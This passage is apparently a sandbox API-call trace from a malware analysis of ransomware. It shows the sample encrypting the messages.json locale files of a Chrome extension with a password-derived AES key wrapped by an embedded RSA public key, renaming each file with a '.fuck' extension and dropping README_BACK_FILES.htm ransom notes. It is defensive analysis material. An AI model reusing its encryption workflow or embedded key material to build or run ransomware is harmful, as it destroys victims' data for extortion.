Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0252.474] AreFileApisANSI () returned 1 [0252.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.474] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.474] GetFileType (hFile=0x5d60) returned 0x1 [0252.475] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.476] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.476] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.476] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.476] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.476] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.476] GetLastError () returned 0x0 [0252.476] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json")) returned 0x20 [0252.476] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0252.477] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.477] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.478] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.480] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.481] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.481] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.482] CryptHashData (hHash=0x29846a0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.482] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.482] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.482] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.482] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b4f8) returned 1 [0252.482] CryptImportPublicKeyInfo (in: hCryptProv=0x298b4f8, dwCertEncodingType=0x1, pInfo=0x2994170*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29941a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29941a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984820) returned 1 [0252.482] CryptEncrypt (in: hKey=0x2984820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.482] CryptEncrypt (in: hKey=0x2984820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c928*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c928*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x298c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c928*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.483] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.484] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.484] CloseHandle (hObject=0x5d5c) returned 1 [0252.484] CloseHandle (hObject=0x5d64) returned 1 [0252.485] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0252.487] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0252.488] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0252.489] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0252.490] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.490] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.490] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.490] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.490] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0252.490] AreFileApisANSI () returned 1 [0252.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.490] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.491] GetFileType (hFile=0x5d60) returned 0x1 [0252.491] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.492] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.492] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.492] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.492] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.492] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.492] GetLastError () returned 0x0 [0252.493] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0252.493] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0252.494] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.494] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.495] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.496] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.498] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.498] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.498] CryptHashData (hHash=0x29846a0, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.498] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.498] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.498] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.498] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c790) returned 1 [0252.498] CryptImportPublicKeyInfo (in: hCryptProv=0x298c790, dwCertEncodingType=0x1, pInfo=0x2994650*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994680*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994688*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984f60) returned 1 [0252.498] CryptEncrypt (in: hKey=0x2984f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.498] CryptEncrypt (in: hKey=0x2984f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ce78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ce78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.499] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298ce78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ce78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.500] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.500] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.501] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.501] CloseHandle (hObject=0x5d64) returned 1 [0252.501] CloseHandle (hObject=0x5d5c) returned 1 [0252.501] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0252.504] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0252.504] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0252.505] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0252.506] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.506] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.506] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.506] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.506] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.506] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0252.506] AreFileApisANSI () returned 1 [0252.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0252.506] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.507] GetFileType (hFile=0x5d60) returned 0x1 [0252.507] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.508] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.508] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.508] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.508] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.508] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.508] GetLastError () returned 0x0 [0252.509] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0252.509] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0252.509] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), 